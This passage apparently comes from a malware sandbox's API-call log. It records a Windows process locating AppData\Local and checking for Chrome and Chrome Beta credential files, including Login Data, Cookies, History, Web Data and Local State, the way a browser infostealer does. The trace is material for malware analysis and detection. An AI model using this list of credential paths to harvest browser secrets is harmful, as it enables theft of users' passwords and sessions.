(HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f0e0 [0180.218] GetProcessHeap () returned 0x5f0000 [0180.218] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f110 [0180.218] GetProcessHeap () returned 0x5f0000 [0180.218] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f60 [0180.218] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.218] GetProcessHeap () returned 0x5f0000 [0180.218] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.218] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5ce830, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.218] GetProcessHeap () returned 0x5f0000 [0180.218] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f120 [0180.218] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.218] GetProcessHeap () returned 0x5f0000 [0180.219] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.219] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.219] GetProcessHeap () returned 0x5f0000 [0180.219] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.219] GetProcessHeap () returned 0x5f0000 [0180.219] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x89) returned 0x61c8b0 [0180.219] GetProcessHeap () returned 0x5f0000 [0180.219] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x45) returned 0x620410 [0180.219] GetProcessHeap () returned 0x5f0000 [0180.219] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620410, Size=0x97) returned 0x611f60 [0180.219] GetProcessHeap () returned 0x5f0000 [0180.219] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4c) returned 0x620690 [0180.219] GetProcessHeap () returned 0x5f0000 [0180.219] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620690, Size=0x9f) returned 0x624900 [0180.219] GetProcessHeap () returned 0x5f0000 [0180.219] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f110, Size=0x50) returned 0x620320 [0180.219] GetProcessHeap () returned 0x5f0000 [0180.219] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.219] GetProcessHeap () returned 0x5f0000 [0180.219] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.219] GetProcessHeap () returned 0x5f0000 [0180.219] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c8b0 | out: hHeap=0x5f0000) returned 1 [0180.219] GetProcessHeap () returned 0x5f0000 [0180.219] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.219] GetProcessHeap () returned 0x5f0000 [0180.219] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f120 | out: hHeap=0x5f0000) returned 1 [0180.219] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.219] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies.bak") returned 0 [0180.219] GetProcessHeap () returned 0x5f0000 [0180.219] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620320 | out: hHeap=0x5f0000) returned 1 [0180.220] GetProcessHeap () returned 0x5f0000 [0180.220] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0180.220] GetProcessHeap () returned 0x5f0000 [0180.220] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0d0 | out: hHeap=0x5f0000) returned 1 [0180.220] GetProcessHeap () returned 0x5f0000 [0180.220] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f0d0 [0180.220] GetProcessHeap () returned 0x5f0000 [0180.220] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615dc0 [0180.220] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.220] GetProcessHeap () returned 0x5f0000 [0180.220] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0180.220] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.220] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.220] GetProcessHeap () returned 0x5f0000 [0180.220] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.220] lstrcpyA (in: lpString1=0x613440, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.220] GetProcessHeap () returned 0x5f0000 [0180.220] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613320 [0180.220] GetProcessHeap () returned 0x5f0000 [0180.220] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613980 [0180.220] GetProcessHeap () returned 0x5f0000 [0180.220] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613980, Size=0x89) returned 0x61caf0 [0180.220] GetProcessHeap () returned 0x5f0000 [0180.220] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x45) returned 0x620410 [0180.220] GetProcessHeap () returned 0x5f0000 [0180.220] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620410, Size=0x9d) returned 0x611f60 [0180.220] GetProcessHeap () returned 0x5f0000 [0180.220] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x4f) returned 0x620230 [0180.220] GetProcessHeap () returned 0x5f0000 [0180.220] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.220] GetProcessHeap () returned 0x5f0000 [0180.220] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61caf0 | out: hHeap=0x5f0000) returned 1 [0180.220] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.220] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 0 [0180.221] GetProcessHeap () returned 0x5f0000 [0180.221] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.221] GetProcessHeap () returned 0x5f0000 [0180.221] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620230 | out: hHeap=0x5f0000) returned 1 [0180.221] GetProcessHeap () returned 0x5f0000 [0180.221] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f0e0 [0180.221] GetProcessHeap () returned 0x5f0000 [0180.221] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ea0 [0180.221] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.221] GetProcessHeap () returned 0x5f0000 [0180.221] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.221] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.221] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.221] GetProcessHeap () returned 0x5f0000 [0180.221] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.221] lstrcpyA (in: lpString1=0x613440, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.221] GetProcessHeap () returned 0x5f0000 [0180.221] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613320 [0180.221] GetProcessHeap () returned 0x5f0000 [0180.221] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613aa0 [0180.221] GetProcessHeap () returned 0x5f0000 [0180.221] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613aa0, Size=0x89) returned 0x61c280 [0180.221] GetProcessHeap () returned 0x5f0000 [0180.221] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x45) returned 0x620050 [0180.221] GetProcessHeap () returned 0x5f0000 [0180.221] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620050, Size=0x97) returned 0x611f60 [0180.221] GetProcessHeap () returned 0x5f0000 [0180.221] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x4c) returned 0x6208c0 [0180.221] GetProcessHeap () returned 0x5f0000 [0180.221] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.221] GetProcessHeap () returned 0x5f0000 [0180.221] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c280 | out: hHeap=0x5f0000) returned 1 [0180.221] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.222] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History") returned 0 [0180.222] GetProcessHeap () returned 0x5f0000 [0180.222] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.222] GetProcessHeap () returned 0x5f0000 [0180.222] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6208c0 | out: hHeap=0x5f0000) returned 1 [0180.222] GetProcessHeap () returned 0x5f0000 [0180.222] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f220 [0180.222] GetProcessHeap () returned 0x5f0000 [0180.222] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ca0 [0180.222] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.222] GetProcessHeap () returned 0x5f0000 [0180.222] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.222] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.222] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.222] GetProcessHeap () returned 0x5f0000 [0180.222] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.222] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.222] GetProcessHeap () returned 0x5f0000 [0180.222] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613440 [0180.222] GetProcessHeap () returned 0x5f0000 [0180.222] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613650 [0180.222] GetProcessHeap () returned 0x5f0000 [0180.222] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613650, Size=0x89) returned 0x61cca0 [0180.222] GetProcessHeap () returned 0x5f0000 [0180.222] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x45) returned 0x620140 [0180.222] GetProcessHeap () returned 0x5f0000 [0180.222] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620140, Size=0x99) returned 0x611f60 [0180.222] GetProcessHeap () returned 0x5f0000 [0180.222] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x4d) returned 0x620960 [0180.222] GetProcessHeap () returned 0x5f0000 [0180.222] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.222] GetProcessHeap () returned 0x5f0000 [0180.222] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61cca0 | out: hHeap=0x5f0000) returned 1 [0180.223] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.223] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 0 [0180.223] GetProcessHeap () returned 0x5f0000 [0180.223] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.223] GetProcessHeap () returned 0x5f0000 [0180.223] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620960 | out: hHeap=0x5f0000) returned 1 [0180.223] GetProcessHeap () returned 0x5f0000 [0180.223] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f230 [0180.223] GetProcessHeap () returned 0x5f0000 [0180.223] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615d60 [0180.223] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.223] GetProcessHeap () returned 0x5f0000 [0180.223] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x5f0000) returned 1 [0180.223] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.223] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.223] GetProcessHeap () returned 0x5f0000 [0180.223] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.223] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.223] GetProcessHeap () returned 0x5f0000 [0180.223] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613440 [0180.223] GetProcessHeap () returned 0x5f0000 [0180.223] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613aa0 [0180.223] GetProcessHeap () returned 0x5f0000 [0180.223] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613aa0, Size=0x89) returned 0x61c940 [0180.223] GetProcessHeap () returned 0x5f0000 [0180.223] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x45) returned 0x6208c0 [0180.223] GetProcessHeap () returned 0x5f0000 [0180.223] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6208c0, Size=0xa5) returned 0x624900 [0180.223] GetProcessHeap () returned 0x5f0000 [0180.223] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x53) returned 0x618950 [0180.223] GetProcessHeap () returned 0x5f0000 [0180.223] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.224] GetProcessHeap () returned 0x5f0000 [0180.224] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c940 | out: hHeap=0x5f0000) returned 1 [0180.224] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.224] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\..\\Local State") returned 0 [0180.224] GetProcessHeap () returned 0x5f0000 [0180.224] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.224] GetProcessHeap () returned 0x5f0000 [0180.224] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618950 | out: hHeap=0x5f0000) returned 1 [0180.224] GetProcessHeap () returned 0x5f0000 [0180.224] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f110 [0180.224] GetProcessHeap () returned 0x5f0000 [0180.224] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ca0 [0180.224] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.224] GetProcessHeap () returned 0x5f0000 [0180.224] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.224] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.224] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.224] GetProcessHeap () returned 0x5f0000 [0180.224] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.224] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.224] GetProcessHeap () returned 0x5f0000 [0180.224] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613440 [0180.224] GetProcessHeap () returned 0x5f0000 [0180.224] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613c20 [0180.224] GetProcessHeap () returned 0x5f0000 [0180.224] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613c20, Size=0x89) returned 0x61c1f0 [0180.224] GetProcessHeap () returned 0x5f0000 [0180.224] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x45) returned 0x620730 [0180.224] GetProcessHeap () returned 0x5f0000 [0180.225] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620730, Size=0x97) returned 0x611f60 [0180.225] GetProcessHeap () returned 0x5f0000 [0180.225] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x4c) returned 0x620320 [0180.225] GetProcessHeap () returned 0x5f0000 [0180.225] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.225] GetProcessHeap () returned 0x5f0000 [0180.225] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c1f0 | out: hHeap=0x5f0000) returned 1 [0180.225] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.225] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies") returned 0 [0180.225] GetProcessHeap () returned 0x5f0000 [0180.225] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.225] GetProcessHeap () returned 0x5f0000 [0180.225] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620320 | out: hHeap=0x5f0000) returned 1 [0180.225] GetProcessHeap () returned 0x5f0000 [0180.225] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0180.225] GetProcessHeap () returned 0x5f0000 [0180.225] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f120 [0180.225] GetProcessHeap () returned 0x5f0000 [0180.225] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ea0 [0180.225] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.225] GetProcessHeap () returned 0x5f0000 [0180.225] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.225] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.225] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.225] GetProcessHeap () returned 0x5f0000 [0180.225] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.225] lstrcpyA (in: lpString1=0x613440, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.225] GetProcessHeap () returned 0x5f0000 [0180.225] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x27) returned 0x613320 [0180.225] GetProcessHeap () returned 0x5f0000 [0180.225] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x6138c0 [0180.226] GetProcessHeap () returned 0x5f0000 [0180.226] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6138c0, Size=0x93) returned 0x611f60 [0180.226] GetProcessHeap () returned 0x5f0000 [0180.226] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x620960 [0180.226] GetProcessHeap () returned 0x5f0000 [0180.226] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620960, Size=0xa7) returned 0x6247e0 [0180.226] GetProcessHeap () returned 0x5f0000 [0180.226] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x54) returned 0x618050 [0180.226] GetProcessHeap () returned 0x5f0000 [0180.226] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0180.226] GetProcessHeap () returned 0x5f0000 [0180.226] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.226] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.226] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data") returned 0 [0180.226] GetProcessHeap () returned 0x5f0000 [0180.226] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.226] GetProcessHeap () returned 0x5f0000 [0180.226] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618050 | out: hHeap=0x5f0000) returned 1 [0180.226] GetProcessHeap () returned 0x5f0000 [0180.226] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f2b0 [0180.226] GetProcessHeap () returned 0x5f0000 [0180.226] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ca0 [0180.226] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.226] GetProcessHeap () returned 0x5f0000 [0180.226] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.226] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.226] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.226] GetProcessHeap () returned 0x5f0000 [0180.226] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.227] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.227] GetProcessHeap () returned 0x5f0000 [0180.227] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x27) returned 0x613440 [0180.227] GetProcessHeap () returned 0x5f0000 [0180.227] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613890 [0180.227] GetProcessHeap () returned 0x5f0000 [0180.227] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613890, Size=0x93) returned 0x611f60 [0180.227] GetProcessHeap () returned 0x5f0000 [0180.227] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x620730 [0180.227] GetProcessHeap () returned 0x5f0000 [0180.227] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620730, Size=0xa1) returned 0x6247e0 [0180.227] GetProcessHeap () returned 0x5f0000 [0180.227] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x51) returned 0x618890 [0180.227] GetProcessHeap () returned 0x5f0000 [0180.227] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0180.227] GetProcessHeap () returned 0x5f0000 [0180.227] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.227] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.227] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\History") returned 0 [0180.227] GetProcessHeap () returned 0x5f0000 [0180.227] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.227] GetProcessHeap () returned 0x5f0000 [0180.227] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618890 | out: hHeap=0x5f0000) returned 1 [0180.227] GetProcessHeap () returned 0x5f0000 [0180.227] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f2d0 [0180.227] GetProcessHeap () returned 0x5f0000 [0180.227] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ce0 [0180.228] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.228] GetProcessHeap () returned 0x5f0000 [0180.228] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x5f0000) returned 1 [0180.228] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.228] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.228] GetProcessHeap () returned 0x5f0000 [0180.228] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.228] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.228] GetProcessHeap () returned 0x5f0000 [0180.228] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x27) returned 0x613440 [0180.228] 